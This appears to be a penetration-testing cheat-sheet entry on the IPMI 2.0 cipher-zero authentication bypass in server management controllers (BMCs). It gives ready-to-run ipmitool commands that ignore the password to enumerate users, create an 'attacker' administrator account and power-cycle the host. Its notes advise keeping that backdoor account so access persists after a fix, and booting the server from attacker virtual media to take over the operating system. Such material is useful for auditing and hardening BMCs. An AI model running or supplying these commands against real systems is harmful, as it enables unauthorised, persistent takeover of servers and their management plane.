IPMI 2.0 negotiates a cipher suite for each session, and cipher suite zero is a special value meaning no authentication and no integrity, intended only for specific local/initial-setup cases. Many BMCs nonetheless accept cipher 0 over the network, and when they do, the controller executes administrative IPMI commands from any client with no valid credential: the password sent is ignored. An attacker simply speaks IPMI with cipher 0 and performs privileged operations, creating an administrator account, reading and changing configuration, and controlling host power and boot device, a full unauthenticated takeover of the BMC and thus the server.
# detect cipher 0 acceptance
nmap -sU -p623 --script ipmi-cipher-zero <target>
# exploit with ipmitool using cipher 0 (-C 0); the password is ignored
ipmitool -I lanplus -C 0 -H <bmc> -U root -P '' user list # enumerate users
ipmitool -I lanplus -C 0 -H <bmc> -U root -P '' user set name 5 attacker
ipmitool -I lanplus -C 0 -H <bmc> -U root -P '' user set password 5 Passw0rd!
ipmitool -I lanplus -C 0 -H <bmc> -U root -P '' user priv 5 4 # admin
ipmitool -I lanplus -C 0 -H <bmc> -U root -P '' chassis power cycle # control the host
Exploitation notes#
-C 0selects cipher zero in ipmitool; because authentication is disabled, the-U/-Pvalues are irrelevant, the commands run regardless, which is the whole bug.- Create a persistent admin BMC account (as above) so access survives even if cipher 0 is later disabled; then use the normal authenticated interface.
- Administrative BMC control means host power, boot-device selection, console, and virtual media, enough to boot the server from an attacker image and compromise the OS, see iDRAC and iLO for the virtual-media step.
- This is unauthenticated and over UDP 623; a reachable BMC accepting cipher 0 is an immediate, complete compromise of the server's management plane.